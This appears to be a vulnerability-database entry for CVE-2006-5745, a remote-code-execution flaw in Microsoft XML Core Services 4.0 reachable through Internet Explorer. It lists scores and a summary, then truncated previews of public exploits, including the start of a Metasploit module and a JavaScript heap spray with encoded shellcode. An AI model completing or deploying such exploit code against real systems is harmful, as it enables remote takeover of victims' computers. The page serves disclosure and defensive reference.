7.6
CVSSv2

CVE-2006-5745

Published: 06/11/2006 Updated: 12/10/2018
CVSS v2 Base Score: 7.6 | Impact Score: 10 | Exploitability Score: 4.9
VMScore: 780
Vector: AV:N/AC:H/Au:N/C:C/I:C/A:C

Vulnerability Summary

Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote malicious users to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft xml core services 4.0

Exploits

/* *----------------------------------------------------------------------- * * MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit * Works on Windows XP versions including SP2 and 2K * * Author: M03 * * Credit: metasploit, jamikazu, yag kohna(for the shellcode), LukeHack (for the code), * Greetz: to PimpinOYeah Subbart ...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 11 plus 20//EN"> <!-- MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit Author: n/a Info: blogssecuriteamcom/indexphp/archives/721 iscsansorg/diaryphp?storyid=1823 xforceissnet/xforce/alerts/id/239 Found in the wild and was pointed out on s ...
## # $Id: ms06_071_xml_corerb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' clas ...
<html xmlns="wwww3org/1999/xhtml"> <body> <script> var heapSprayToAddress = 0x05050505; var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B ...